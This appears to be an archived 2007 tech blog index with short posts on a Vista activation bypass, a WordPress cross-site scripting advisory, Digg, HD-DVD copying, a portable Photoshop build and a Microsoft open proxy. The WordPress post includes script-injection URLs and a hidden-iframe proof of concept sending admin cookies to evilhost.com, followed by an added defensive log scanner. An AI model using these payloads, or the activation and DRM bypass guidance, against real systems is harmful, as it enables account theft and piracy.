Microsoft allows large hardware manufacturers (e.g. ASUS, HP, Dell) to ship their products containing a Windows Vista installation that does NOT require any kind of product activation as this might be considered an unnecessary inconvenience for the end-user. Instead these so-called ‘Royalty OEMs’ are granted the right to embed certain license information into their hardware products, which can be validated by Windows Vista…
http://www.haklabs.com/2007/bypass-vista-activation-with-paradox/
Tags: Windows
February 28th, 2007 · 2 Comments
A vulnerability has been identified in WordPress, which could be exploited by attackers to execute arbitrary scripting code to compromise the admin account.
Here are some examples of arbitrary script execution:
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Here is proof-of-concept code to steal the admin cookies:
<iframe width="0" height="0" src="http://somesite.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27"></iframe>
Solution:
http://trac.wordpress.org/changeset/4951
http://trac.wordpress.org/changeset/4952
Original advisory at seclists.org
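A defender's view of the requests above, as an added example that is not part of the original advisory: it flags wp-admin requests whose `c`, `p` or `post` parameter is not a plain integer, assuming these parameters carry numeric IDs as `p=35` does in the URLs above. The log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters seen in the advisory's URLs; assumed to carry numeric IDs.
ID_PARAMS = {"c", "p", "post"}
ADMIN_SCRIPTS = ("/wp-admin/comment.php", "/wp-admin/post.php")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = '''\
192.0.2.10 - - [28/Feb/2007:10:00:01 +0000] "GET /wp-admin/comment.php?action=deletecomment&p=35&c=12 HTTP/1.1" 200 512
192.0.2.11 - - [28/Feb/2007:10:00:07 +0000] "GET /wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 734
192.0.2.12 - - [28/Feb/2007:10:00:09 +0000] "GET /wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 690
192.0.2.13 - - [28/Feb/2007:10:00:15 +0000] "GET /index.php?p=39 HTTP/1.1" 200 4096
'''


def suspicious_params(request_target):
    """Return [(name, decoded_value)] for ID parameters that are not integers."""
    parts = urlsplit(request_target)
    if not parts.path.endswith(ADMIN_SCRIPTS):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name not in ID_PARAMS:
            continue
        # parse_qsl decodes once; decode again so %253C-style input is readable.
        decoded = unquote(value)
        if not re.fullmatch(r"[0-9]+", decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Yield (line_number, hits) for access-log lines with non-numeric IDs."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, hits


if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG.splitlines()):
        print(number, hits)
```

The same integer-only rule is what server-side input validation for these parameters would enforce before the value is echoed into a page.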
Tags: Wordpress
Here is something I found at SearchBistro.com a while ago:
What is it? It’s a lab of humans from all over the world (from China to The Netherlands, from Korea to Brazil). They are paid to check search results of Google every day. Most of the employees, called international agents by Google, were recruited through universities all over the world. The aim is to avoid spam, to get the right sites at the top of the listing and to test new features, not shown to the public yet.
Click here for a video from Google’s Secret Evaluation Lab!
Tags: Google
February 26th, 2007 · 1 Comment
It seems that finally the Digg.com crew pleased some of their users by adding a photo preview. For the time being it seems that it is only working for Flickr images… But still it’s pretty cool! Thanks for keeping your users pleased.
Tags: Digg
February 18th, 2007 · 2 Comments
I was goofing around with Fiddler (HTTP Debugging Proxy) and I noticed something weird about the response headers from Digg.com. Take a look:
HTTP/1.1 200 OK
Date: Sun, 18 Feb 2007 05:11:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Encoding: gzip
Content-Length: 10657
As our friend Google would say…
Did you mean: Connection
Tags: Digg
February 5th, 2007 · 1 Comment
For all the iPod lovers out there like me, here is an amazing list of all the songs used in all the iPod ads:
http://www.macsupport.ca/2007/02/04/songs-from-ipod-commercials/
Pretty impressive!
Tags: iPod
February 3rd, 2007 · 1 Comment
15 days ago the first HD-DVD movie was leaked onto BitTorrent by someone under the nickname Lyzz. At the time I couldn’t believe that doing a backup of an HD-DVD movie was possible, but after some research and thanks to several amazing tools developed by the community at Doom9.net I found that creating a backup of your favorite HD-DVD movies is possible and even easy. Here is a small guide to create personal backups of your favorite HD-DVD movies. Enjoy it!
Tags: HD-DVD
January 22nd, 2007 · 3 Comments
Mozilla Firefox is a fast, full-featured web browser that’s easy to use. It has lots of great features including popup-blocking, tabbed-browsing, integrated search, improved privacy features, automatic updating and more. Plus, thanks to the PortableApps.com launcher bundled in Mozilla Firefox - Portable Edition, it leaves no personal information behind on the machine you run it on, so you can take your favorite browser along with all your favorite bookmarks and extensions with you wherever you go.
Tags: Firefox
January 22nd, 2007 · 9 Comments
An easy guide to making a portable installation of Adobe Photoshop CS2 and ImageReady (just 26MB!). This portable installation is perfect for use under Ubuntu (or any other Linux flavor) with the help of WINE.
Tags: Software
January 13th, 2007 · 4 Comments
I was surfing the internet looking for proxies when I stumbled upon this one:
131.107.64.93:80
Quite fast & reliable actually, but as the privacy-concerned person that I am, I decided to investigate a little further into this proxy just to know whose network I was using ;)….
I was quite shocked to see this because the vast majority of the open proxies out there are due to misconfiguration and they represent a serious security risk.
So please, someone tell me: why does Microsoft have an open proxy in their corporate network? Is it just misconfiguration… or something more evil?
Tags: Microsoft